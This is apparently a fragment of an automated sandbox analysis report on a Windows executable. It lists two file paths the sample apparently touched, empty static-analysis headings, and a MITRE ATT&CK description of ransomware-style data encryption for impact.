C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\eb42b1a5c308fc11edf1ddbdd25c8486_d06ed635-68f6-4e9a-955c-4899f5f57b9a

C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Windows Analysis Report
O8ZHhytWhn.exe

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre